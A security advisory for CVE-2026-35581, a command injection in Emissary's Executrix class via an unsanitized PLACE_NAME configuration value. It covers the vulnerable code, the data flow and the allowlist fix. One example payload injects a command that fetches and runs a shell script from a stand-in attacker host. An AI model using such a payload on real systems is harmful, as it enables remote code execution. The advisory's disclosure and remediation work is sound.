CVE-2026-35581
Emissary has a Command Injection via PLACE_NAME Configuration in Executrix
Description
## Summary The `Executrix` utility class constructed shell commands by concatenating configuration-derived values — including the `PLACE_NAME` parameter — with insufficient sanitization. Only spaces were replaced with underscores, allowing shell metacharacters (`;`, `|`, `$`, `` ` ``, `(`, `)`, etc.) to pass through into `/bin/sh -c` command execution. ## Details ### Vulnerable code — `Executrix.java` **Insufficient sanitization (line 132):** ```java this.placeName = this.placeName.replace(' ', '_'); // ONLY replaces spaces — shell metacharacters pass through ``` **Shell sink (line 1052–1058):** ```java protected String[] getTimedCommand(final String c) { return new String[] {"/bin/sh", "-c", "ulimit -c 0; cd " + tmpNames[DIR] + "; " + c}; } ``` ### Data flow 1. `PLACE_NAME` is read from a configuration file 2. `Executrix` applies only a space-to-underscore replacement 3. The `placeName` is used to construct temporary directory paths (`tmpNames[DIR]`) 4. `tmpNames[DIR]` is concatenated into a shell command string 5. The command is executed via `/bin/sh -c` ### Example payload ``` PLACE_NAME = "test;curl attacker.com/shell.sh|bash;x" ``` After the original sanitization: `test;curl_attacker.com/shell.sh|bash;x` (semicolons, pipes, and other metacharacters preserved) ### Impact - Arbitrary command execution on the Emissary host - Requires the ability to control configuration values (e.g., administrative access or a compromised configuration source) ## Remediation Fixed in [PR #1290](https://github.com/NationalSecurityAgency/emissary/pull/1290), merged into release 8.39.0. The space-only replacement was replaced with an allowlist regex that strips all characters not matching `[a-zA-Z0-9_-]`: ```java protected static final Pattern INVALID_PLACE_NAME_CHARS = Pattern.compile("[^a-zA-Z0-9_-]"); protected static String cleanPlaceName(final String placeName) { return INVALID_PLACE_NAME_CHARS.matcher(placeName).replaceAll("_"); } ``` This ensures that any shell metacharacter in the `PLACE_NAME` configuration value is replaced with an underscore before it can reach a command string. Tests were added to verify that parentheses, slashes, dots, hash, dollar signs, backslashes, quotes, semicolons, carets, and at-signs are all sanitized. ## Workarounds If upgrading is not immediately possible, ensure that `PLACE_NAME` values in all configuration files contain only alphanumeric characters, underscores, and hyphens. ## References - [PR #1290 — validate placename with an allowlist](https://github.com/NationalSecurityAgency/emissary/pull/1290) - Original report: GHSA-wjqm-p579-x3ww
How to fix CVE-2026-35581
To remediate CVE-2026-35581, upgrade the affected package to a fixed version below.